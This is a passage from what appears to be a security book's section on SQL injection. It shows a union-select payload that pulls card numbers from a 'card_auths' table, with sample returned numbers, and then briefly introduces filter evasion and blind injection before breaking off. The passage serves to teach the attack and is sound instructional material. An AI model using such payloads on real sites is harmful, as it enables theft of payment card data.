
returns:
1234666633337890
storyid=0 union select card_no from card_auths where card_no
>1234666633337890
returns:
1234678911114567
There are more techniques available for SQL injection, but they go beyond
the scope of this book. New techniques include:
■
Evading single quote filters This is when the programmer knows to
remove or replace single quotes. It was formerly thought that this step
would remove the possibility of SQL injection against strings, although
typing input would prevent it against integer values.There is a technique
using a SQL function that will still allow the insertion of string values
into the database.
■
Blind SQL injection This is an ...